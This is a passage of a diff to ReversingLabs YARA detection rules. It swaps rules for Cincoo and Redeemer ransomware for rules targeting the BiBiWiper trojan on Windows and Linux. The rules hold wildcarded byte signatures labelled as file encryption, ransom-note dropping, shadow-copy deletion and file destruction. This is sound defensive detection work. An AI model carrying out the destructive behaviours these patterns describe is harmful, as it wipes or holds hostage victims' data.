meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "64aa17fe-676d-5c6e-babc-15b5e8dc72bb" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17272-L17288" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ef49a28a93d31c55dd2dfd3bec645f757a0a1a7eb8718ce92cf47bf9af126aed" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($drop_hta_file_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE4\\xB8\\x9C\\xE8\\x8E\\x9E\\xE5\\xB8\\x82\\xE8\\x85\\xBE\\xE4\\xBA\\x91\\xE8\\xAE\\xA1\\xE7\\xAE\\x97\\xE6\\x9C\\xBA\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="08:aa:03:f3:85:f8:70:e3:a6:d2:43:b7:4b:1d:ad:f6" and 1352678400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Cincoo : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Cincoo ransomware." + description = "Yara rule that detects BiBiWiper trojan." author = "ReversingLabs" - id = "c7c2773c-5056-5127-8af7-7f5c5a8ea8a1" - date = "2022-06-21" - modified = "2022-06-21" + id = "8462ceb8-ec54-5f92-a3e7-c96e52647ca7" + date = "2023-11-28" + modified = "2023-11-28" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Cincoo.yara#L1-L78" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6a7562cae90754ea75a9fb98ce73ebdb9acf1ad7f28f2240abe6cb592d717ca3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/trojan/Win32.Trojan.BiBiWiper.yara#L1-L102" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d75954c05a8f82ad90a4adf6a2a3748928488ddebe40d8f8a790bfcde0b02a11" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Cincoo" + tc_detection_type = "Trojan" + tc_detection_name = "BiBiWiper" tc_detection_factor = 5 importance = 25 strings: - $find_files = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? - 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 55 ?? 8B D9 83 7B ?? ?? 8B F3 8B 45 ?? 8B 7D - ?? 89 45 ?? 72 ?? 8B 33 8D 4E ?? 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 0F 84 - ?? ?? ?? ?? 3B 73 ?? 0F 85 ?? ?? ?? ?? 88 45 ?? 8D 55 ?? FF 75 ?? 8D 4D ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? - ?? 50 8B CB E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B - C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? - ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7B ?? ?? 72 ?? 8B 1B 8B 75 ?? 57 56 53 E8 ?? ?? - ?? ?? 85 C0 75 ?? 8B 36 8B CF E8 ?? ?? ?? ?? 84 C0 74 ?? 57 56 E8 ?? ?? ?? ?? 85 C0 - 75 ?? 8B CF E8 ?? ?? ?? ?? 84 C0 75 ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E - 5B 8B E5 5D C3 + $delete_shadow_copies_p1 = { + 48 89 5C 24 ?? 55 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 + 48 89 45 ?? 33 DB 48 C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 5C 24 ?? 48 + 8D 4C 24 ?? 48 89 5C 24 ?? 44 8D 43 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 + ?? 48 8B 54 24 ?? 48 0F 43 4C 24 ?? 48 03 D1 48 8D 4C 24 ?? 48 83 7C 24 ?? ?? 48 0F + 43 4C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8D 55 ?? 48 0F 43 4C + 24 ?? 48 2B D1 0F B6 01 88 04 0A 48 8D 49 ?? 84 C0 75 ?? 0F 57 C0 C7 44 24 ?? ?? ?? + ?? ?? 48 8D 45 ?? 45 33 C9 48 89 44 24 ?? 48 8D 55 ?? 48 8D 44 24 ?? 45 33 C0 48 89 + 44 24 ?? 33 C9 48 89 5C 24 ?? 48 89 5C 24 ?? 0F 11 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89 + 5C 24 ?? 0F 11 44 24 ?? 66 89 5D ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? + FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8B 4C 24 ?? 48 FF C2 48 8B C1 + 48 81 FA ?? ?? ?? ?? 72 ?? 48 8B 49 ?? 48 83 C2 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? + 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? + ?? 48 89 5C 24 ?? 48 8D 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 7C + 24 ?? ?? 48 8D 4C 24 ?? 48 8B 54 24 ?? 48 0F 43 4C 24 ?? 48 03 D1 48 8D 4C 24 ?? 48 + 83 7C 24 ?? ?? 48 0F 43 4C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 + 8D 55 ?? 48 0F 43 4C 24 ?? 48 2B D1 0F B6 01 88 04 0A 48 8D 49 ?? 84 C0 75 ?? 0F 57 + C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 45 ?? 45 33 C9 48 89 44 24 ?? 48 8D 55 ?? 48 8D 44 + 24 ?? 45 33 C0 48 89 44 24 ?? 33 C9 48 89 5C 24 ?? 48 89 5C 24 ?? 0F 11 45 ?? C7 44 + 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 0F 11 44 24 ?? 66 89 5D ?? 0F 11 45 ?? 0F 11 45 ?? 0F } - $encrypt_files = { - 55 8B EC 83 EC ?? 8B 45 ?? 53 8B D9 89 45 ?? B9 ?? ?? ?? ?? 8B C1 56 8B 53 ?? 2B C2 - 8B 75 ?? 89 55 ?? 57 3B C6 0F 82 ?? ?? ?? ?? 8B 7B ?? 8D 04 32 8B F0 89 45 ?? 83 CE - ?? 89 7D ?? 3B F1 76 ?? 8B F1 EB ?? 8B C7 D1 E8 2B C8 3B F9 76 ?? BE ?? ?? ?? ?? EB - ?? 03 C7 3B F0 0F 42 F0 33 C9 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 81 F9 ?? ?? ?? ?? - 72 ?? 8D 41 ?? 3B C1 0F 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? - ?? ?? 8B 55 ?? 8D 78 ?? 83 E7 ?? 89 47 ?? EB ?? 85 C9 74 ?? 51 E8 ?? ?? ?? ?? 8B 55 - ?? 83 C4 ?? 8B F8 EB ?? 33 FF 8B 45 ?? 89 43 ?? 8B 45 ?? 89 73 ?? 8D 34 3A 03 C6 83 - 7D ?? ?? 89 45 ?? 52 72 ?? 8B 33 56 57 E8 ?? ?? ?? ?? FF 75 ?? 8B 45 ?? FF 75 ?? 03 - C7 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 4D ?? 41 C6 00 ?? 81 F9 ?? ?? ?? ?? 72 ?? - 8B 56 ?? 83 C1 ?? 2B F2 8D 46 ?? 83 F8 ?? 77 ?? 8B F2 51 56 E8 ?? ?? ?? ?? 83 C4 ?? - 89 3B 8B C3 5F 5E 5B 8B E5 5D C2 ?? ?? 53 57 E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 56 E8 - ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? C6 00 ?? 8B C3 89 3B 5F 5E 5B 8B E5 5D C2 ?? ?? E8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC CC CC 56 8B F1 FF 76 ?? E8 ?? ?? ?? ?? 8B - 4E ?? 83 F9 ?? 72 ?? 8B 06 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 - C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? - ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? 66 89 06 5E C3 E8 ?? ?? ?? ?? CC CC CC CC CC CC - 8B 09 85 C9 74 ?? 8B 01 6A ?? FF 10 C3 + $delete_shadow_copies_p2 = { + 11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8B 4C 24 + ?? 48 FF C2 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 8B 49 ?? 48 83 C2 ?? 48 2B C1 48 + 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 5C 24 + ?? 48 8D 15 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8B 54 24 ?? 48 0F 43 4C 24 ?? 48 03 + D1 48 8D 4C 24 ?? 48 83 7C 24 ?? ?? 48 0F 43 4C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? + ?? 48 8D 4C 24 ?? 48 8D 55 ?? 48 0F 43 4C 24 ?? 48 2B D1 90 0F B6 01 88 04 0A 48 8D + 49 ?? 84 C0 75 ?? 0F 57 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 45 ?? 45 33 C9 48 89 44 24 + ?? 48 8D 55 ?? 48 8D 44 24 ?? 45 33 C0 48 89 44 24 ?? 33 C9 48 89 5C 24 ?? 48 89 5C + 24 ?? 0F 11 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 0F 11 44 24 ?? 66 89 5D ?? 0F + 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 83 + FA ?? 72 ?? 48 8B 4C 24 ?? 48 FF C2 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 8B 49 ?? + 48 83 C2 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 + ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 4C 24 ?? 48 C7 + 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8B 54 24 ?? + 48 0F 43 4C 24 ?? 48 03 D1 48 8D 4C 24 ?? 48 83 7C 24 ?? ?? 48 0F 43 4C 24 ?? E8 ?? + ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8D 55 ?? 48 0F 43 4C 24 ?? 48 2B D1 90 + 0F B6 01 88 04 0A 48 8D 49 ?? 84 C0 75 ?? 0F 57 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 45 + ?? 45 33 C9 48 89 44 24 ?? 48 8D 55 ?? 48 8D 44 24 ?? 45 33 C0 48 89 44 24 ?? 33 C9 + 48 89 5C 24 ?? 48 89 5C 24 ?? 0F 11 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 } - $drop_ransom_note = { - 52 51 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 8D 4D ?? C6 46 ?? ?? - E8 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B CE C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 8D - 4E ?? 50 E8 ?? ?? ?? ?? 81 CF ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? - ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 89 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 83 F8 ?? - 72 ?? 83 FA ?? 8D B5 ?? ?? ?? ?? 8D 41 ?? 0F 43 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D - 04 0E 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 44 30 ?? ?? 8D 85 ?? ?? ?? ?? - EB + $destroy_files_p1 = { + 48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 + 33 C4 48 89 44 24 ?? 4D 8B E9 4D 8B E0 4C 8B F9 48 63 BC 24 ?? ?? ?? ?? 33 F6 89 74 + 24 ?? 48 8B 05 ?? ?? ?? ?? 48 FF C0 48 89 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 B8 + ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 E9 48 C1 FA ?? 48 8B C2 48 C1 E8 ?? 48 03 D0 48 69 C2 + ?? ?? ?? ?? 48 3B C8 75 ?? 4C 8B 05 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8D 0D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 C1 E3 ?? 33 D2 49 8B C4 49 F7 F5 48 + 8B E8 48 2B EB 83 FF ?? 7E ?? 48 8D 47 ?? 48 0F AF C3 33 D2 49 F7 F4 EB ?? 48 8B D6 + 45 33 C0 49 8B CF E8 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? 48 63 C8 49 3B CC 0F 87 ?? + ?? ?? ?? 49 8B C4 48 2B C1 49 8B FC 48 2B F9 48 3B D8 48 0F 42 FB 48 8B CF E8 ?? ?? + ?? ?? 48 89 44 24 ?? 0F 57 C0 4C 63 F7 F3 0F 7F 44 24 ?? 48 89 74 24 ?? 85 FF 74 ?? + 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 4C 3B F0 0F 87 ?? ?? ?? ?? 49 81 FE ?? ?? ?? ?? 72 + } + $destroy_files_p2 = { + 49 8D 4E ?? 49 3B CE 0F 86 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 85 C0 0F 84 ?? ?? + ?? ?? 48 83 C0 ?? 48 83 E0 ?? 48 89 48 ?? EB ?? 49 8B CE E8 ?? ?? ?? ?? 48 89 44 24 + ?? 4A 8D 1C 30 48 89 5C 24 ?? 4D 8B C6 33 D2 48 8B C8 E8 ?? ?? ?? ?? 48 89 5C 24 ?? + C7 44 24 ?? ?? ?? ?? ?? 85 FF 7E ?? 48 8B DE 44 8B F7 66 0F 1F 44 00 ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 88 04 0B 48 8D 5B ?? 49 83 EE ?? 75 ?? 4D 85 ED 7E + ?? 4D 8B CF 41 B8 ?? ?? ?? ?? 48 8B D7 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 49 8B CF E8 ?? + ?? ?? ?? 48 63 C8 48 8D 04 29 48 03 C7 49 3B C4 76 ?? 49 8B FC 48 2B F9 48 2B FD 48 + 85 FF 7E ?? 41 B8 ?? ?? ?? ?? 48 8B D5 49 8B CF E8 ?? ?? ?? ?? FF C6 48 63 C6 49 3B + C5 7C ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 54 24 + ?? 48 2B D1 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 + 83 C0 ?? 48 83 F8 ?? 77 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 + 8B 9C 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3 } condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($drop_ransom_note) + uint16(0)==0x5A4D and ( all of ($delete_shadow_copies_p*)) and ( all of ($destroy_files_p*)) } -rule REVERSINGLABS_Win32_Ransomware_Redeemer : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Linux_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Redeemer ransomware." + description = "Yara rule that detects BiBiWiper trojan." author = "ReversingLabs" - id = "080ab595-862b-5dc2-aaff-a0efd819a9fa" - date = "2022-01-17" - modified = "2022-01-17" + id = "c370dde0-71ff-5832-b131-6d61beb02b9b" + date = "2023-11-28" + modified = "2023-11-28" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Redeemer.yara#L1-L105" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "28287f6620a2f7a90057d1f97947e065721119e26398fe659331dc5fe99761de" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/trojan/Linux.Trojan.BiBiWiper.yara#L1-L76" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8f290141d5da660463dede6df571d774448e136e2993a0a4c706245464e1239e" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Redeemer" + tc_detection_type = "Trojan" + tc_detection_name = "BiBiWiper" tc_detection_factor = 5 importance = 25 strings: - $find_files = { - 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? - 8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 89 B5 ?? ?? - ?? ?? 89 B5 ?? ?? ?? ?? 3B F7 0F 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? - ?? 8B 3D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? - C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? - ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B - CC 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 - } - $encrypt_files_p1 = { - 80 FB ?? 0F 85 ?? ?? ?? ?? 83 EC ?? 8D 55 ?? 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? - C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 33 D2 - 6A ?? 66 89 10 8D 45 ?? 52 50 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 - 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 33 D2 6A ?? 66 89 10 8D 45 ?? - 52 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 8D 45 ?? 3B C6 - 74 ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 C0 C7 45 ?? - ?? ?? ?? ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C6 45 - } - $encrypt_files_p2 = { - 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 35 ?? ?? ?? ?? 33 C0 83 7D ?? ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? - 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D6 85 C0 0F 85 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 50 FF D6 8B 85 ?? ?? ?? - ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? E9 ?? - ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 45 ?? 83 C4 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 - C0 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 8D - 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E - 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 E8 + $destroy_files_p1 = { + 55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 48 89 + 95 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 44 89 8D ?? ?? ?? ?? 48 8B + 05 ?? ?? ?? ?? 48 83 C0 ?? 48 89 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 BA ?? ?? ?? + ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 89 D0 48 C1 F8 ?? 48 89 CA 48 C1 FA ?? 48 29 D0 + 48 69 D0 ?? ?? ?? ?? 48 89 C8 48 29 D0 48 85 C0 0F 94 C0 84 C0 74 ?? E8 ?? ?? ?? ?? + 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 + D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? + ?? 48 8D 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 CE 48 89 C7 + E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 + CE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? + ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D + 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? + 48 8D 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? + ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 + 89 C3 48 8D 8D ?? ?? ?? ?? 48 8D 45 ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? + ?? 48 8D 45 ?? 48 89 DE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 } - $modify_processes_p1 = { - 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? 